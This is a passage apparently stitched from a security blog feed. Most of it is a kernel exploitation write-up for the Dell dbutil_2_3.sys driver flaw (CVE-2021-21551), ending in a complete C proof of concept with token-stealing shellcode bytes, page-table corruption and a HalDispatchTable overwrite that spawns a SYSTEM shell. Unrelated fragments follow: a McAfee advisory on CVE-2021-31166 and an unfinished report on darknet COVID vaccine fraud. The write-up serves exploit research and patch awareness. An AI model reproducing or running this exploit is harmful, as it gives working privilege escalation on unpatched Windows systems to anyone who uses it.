Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate where the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
  // Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
  LPVOID lpImageBase[1024];
  DWORD lpcbNeeded;
  int drivers;
  char lpFileName[1024];
  unsigned long long imageBase;

  BOOL baseofDrivers = EnumDeviceDrivers(
    lpImageBase,
    sizeof(lpImageBase),
    &lpcbNeeded
  );

  // Error handling
  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
  {
    GetDeviceDriverBaseNameA(
      lpImageBase[i],
      lpFileName,
      sizeof(lpFileName) / sizeof(char)
    );

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
    {
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop
      break;
    }
  }

  return imageBase;
}


void exploitWork(void)
{
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(
      driverHandle,
      IOCTL_READ_CODE,
      &inBuf1,
      sizeof(inBuf1),
      &inBuf1,
      sizeof(inBuf1),
      &bytesReturned1,
      NULL
    );

    // Error handling
    if (!interact)
    {
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      exit(-1);
    }
    else
    {
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(
        driverHandle,
        IOCTL_READ_CODE,
        &inBuf2,
        sizeof(inBuf2),
        &inBuf2,
        sizeof(inBuf2),
        &bytesReturned2,
        NULL
      );

      // Error handling
      if (!interact1)
      {
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
      else
      {
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

        /*
          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

          _start:
            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
          __loop:
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!

        */

        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf3,
          sizeof(inBuf3),
          &inBuf3,
          sizeof(inBuf3),
          &bytesReturned3,
          NULL
        );

        BOOL interact3 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf4,
          sizeof(inBuf4),
          &inBuf4,
          sizeof(inBuf4),
          &bytesReturned4,
          NULL
        );

        BOOL interact4 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf5,
          sizeof(inBuf5),
          &inBuf5,
          sizeof(inBuf5),
          &bytesReturned5,
          NULL
        );

        BOOL interact5 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf6,
          sizeof(inBuf6),
          &inBuf6,
          sizeof(inBuf6),
          &bytesReturned6,
          NULL
        );

        BOOL interact6 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf7,
          sizeof(inBuf7),
          &inBuf7,
          sizeof(inBuf7),
          &bytesReturned7,
          NULL
        );

        BOOL interact7 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf8,
          sizeof(inBuf8),
          &inBuf8,
          sizeof(inBuf8),
          &bytesReturned8,
          NULL
        );

        BOOL interact8 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf9,
          sizeof(inBuf9),
          &inBuf9,
          sizeof(inBuf9),
          &bytesReturned9,
          NULL
        );

        BOOL interact9 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf10,
          sizeof(inBuf10),
          &inBuf10,
          sizeof(inBuf10),
          &bytesReturned10,
          NULL
        );

        BOOL interact10 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf11,
          sizeof(inBuf11),
          &inBuf11,
          sizeof(inBuf11),
          &bytesReturned11,
          NULL
        );

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
        {
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          exit(-1);
        }
        else
        {
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;


          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(
            driverHandle,
            IOCTL_WRITE_CODE,
            &inBuf13,
            sizeof(inBuf13),
            &inBuf13,
            sizeof(inBuf13),
            &bytesReturned13,
            NULL
          );

          // Error handling
          if (!interact12)
          {
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          }
          else
          {
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(
              driverHandle,
              IOCTL_READ_CODE,
              &inBuf14,
              sizeof(inBuf14),
              &inBuf14,
              sizeof(inBuf14),
              &bytesReturned14,
              NULL
            );

            // Error handling
            if (!interact13)
            {
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            }
            else
            {
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(
                driverHandle,
                IOCTL_WRITE_CODE,
                &inBuf15,
                sizeof(inBuf15),
                &inBuf15,
                sizeof(inBuf15),
                &bytesReturned15,
                NULL
              );

              // Error handling
              if (!interact14)
              {
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              }
              else
              {
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
                  GetModuleHandle(
                    TEXT("ntdll.dll")),
                  "NtQueryIntervalProfile"
                );

                // Error handling
                if (!NtQueryIntervalProfile)
                {
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  exit(1);
                }
                else
                {
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;

                  NtQueryIntervalProfile(
                    0x1234,
                    &exploit
                  );

                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(
                    driverHandle,
                    IOCTL_WRITE_CODE,
                    &inBuf16,
                    sizeof(inBuf16),
                    &inBuf16,
                    sizeof(inBuf16),
                    &bytesReturned16,
                    NULL
                  );

                  // Error handling
                  if (!interact15)
                  {
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                  }
                  else
                  {
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

// Call exploitWork()
void main(void)
{
  exploitWork();
}

Major HTTP Vulnerability in Windows Could Lead to Wormable Exploit

12 May 2021 at 15:48
AI Cyber Security

Today, Microsoft released a highly critical vulnerability (CVE-2021-31166) in its web server http.sys. This product is a Windows-only HTTP server which can be run standalone or in conjunction with IIS (Internet Information Services) and is used to broker internet traffic via HTTP network requests. The vulnerability is very similar to CVE-2015-1635, another Microsoft vulnerability in the HTTP network stack reported in 2015.

With a CVSS score of 9.8, the vulnerability announced has the potential to be both directly impactful and is also exceptionally simple to exploit, leading to a remote and unauthenticated denial-of-service (Blue Screen of Death) for affected products.

The issue is due to Windows improperly tracking pointers while processing objects in network packets containing HTTP requests. As HTTP.SYS is implemented as a kernel driver, exploitation of this bug will result in at least a Blue Screen of Death (BSoD), and in the worst-case scenario, remote code execution, which could be wormable. While this vulnerability is exceptional in terms of potential impact and ease of exploitation, it remains to be seen whether effective code execution will be achieved. Furthermore, this vulnerability only affects the latest versions of Windows 10 and Windows Server (2004 and 20H2), meaning that the exposure for internet-facing enterprise servers is fairly limited, as many of these systems run Long Term Servicing Channel (LTSC) versions, such as Windows Server 2016 and 2019, which are not susceptible to this flaw.

At the time of this writing, we are unaware of any “in-the-wild” exploitation for CVE-2021-31166 but will continue to monitor the threat landscape and provide relevant updates. We urge Windows users to apply the patch immediately wherever possible, giving special attention to externally facing devices that could be compromised from the internet. For those who are unable to apply Microsoft’s update, we are providing a “virtual patch” in the form of a network IPS signature that can be used to detect and prevent exploitation attempts for this vulnerability.

McAfee Network Security Platform (NSP) Protection
Sigset Version: 10.8.21.2
Attack ID: 0x4528f000
Attack Name: HTTP: Microsoft HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)

McAfee Knowledge Base Article KB94510:
https://kc.mcafee.com/corporate/index?page=content&id=KB94510

 

 

The post Major HTTP Vulnerability in Windows Could Lead to Wormable Exploit appeared first on McAfee Blog.

“Fool’s Gold”: Questionable Vaccines, Bogus Results, and Forged Cards

By: Anne An
11 May 2021 at 04:01

Preface

Countries all over the world are racing to achieve so-called herd immunity against COVID-19 by vaccinating their populations. From the initial lockdown to the cancellation of events and the prohibition of business travel, to the reopening of restaurants, and relaxation of COVID restrictions on outdoor gatherings, the vaccine rollout has played a critical role in staving off another wave of infections and restoring some degree of normalcy. However, a new and troubling phenomenon is that consumers are buying COVID-19 vaccines on the black market due to the increased demand around the world. As a result, illegal COVID-19 vaccines and vaccination records are in high demand on darknet marketplaces.

The impact on society is that the proliferation of fraudulent test results and counterfeit COVID-19 vaccine records pose a serious threat to public health and spur the underground economyIndividuals undoubtedly long to return to their pre-pandemic routines and the freedom of travel and behavior denied them over the last year. However, the purchase of false COVID-19 test certifications or vaccination cards to board aircraft, attend an event or enter a country endangers themselves, even if they are asymptomatic. It also threatens the lives of other people in their own communities and around the world. Aside from the collective damage to global health, darknet marketplace transactions encourage the supply of illicit goods and services. The underground economy cycle continues as demand creates inventory, which in turn creates supply. In addition to selling COVID-19 vaccines, vaccination cards, and fake test results, cybercriminals can also benefit by reselling the names, dates of birth, home addresses, contact details, and other personally indefinable information of their customers. 

Racing Toward a Fully Vaccinated Society Along with a Growing Underground Vaccine Market

As we commemorate the one-year anniversary of the COVID-19 pandemic, at least 184 countries and territories worldwide have started their vaccination rollouts.[1] The United States is vaccinating Americans at an unprecedented rate. As of May 2021, more than 105 million Americans had been fully vaccinated. The growing demand has made COVID-19 vaccines the new “liquid gold” in the pandemic era.

However, following vaccination success, COVID-19 related cybercrime has increased. COVID-19 vaccines are currently available on at least a dozen darknet marketplaces. Pfizer-BioNTech COVID-19 vaccines (and we can only speculate as to whether they are genuine or a form of liquid “fool’s gold”) can be purchased for as little as $500 per dose from top-selling vendors. These sellers use various channels, such as Wickr, Telegram, WhatsApp and Gmail, for advertising and communications. Darknet listings associated with alleged Pfizer-BioNTech COVID-19 vaccines are selling for $600 to $2,500. Prospective buyers can receive the product within 2 to 10 days. Some of these supposed COVID-19 vaccines are imported from the United States, while others are packed in the United Kingdom and shipped to every country in the world, according to the underground advertisement.

Figure 1: Dark web marketplace offering COVID-19 vaccines

Figure 2: Dark web marketplace offering COVID-19 vaccines

A vendor sells 10 doses of what they claim to be Moderna COVID-29 vaccines for $2,000. According to the advertisement, the product is available to ship to the United Kingdom and worldwide.

Figure 3: Dark web marketplace offering COVID-19 vaccines

Besides what are claimed to be COVID-19 vaccines, cybercriminals offer antibody home test kits for $152 (again, we do not know whether they are genuine or not). According to the advertisement, there are various shipping options available. It costs $41 for ‘stealth’ shipping to the United States, $10.38 to ship to the United Kingdom, and $20 to mail the vaccines internationally.

Figure 4: Dark web marketplace offering COVID-19 test kits

Proof of Vaccination in the Underground Market

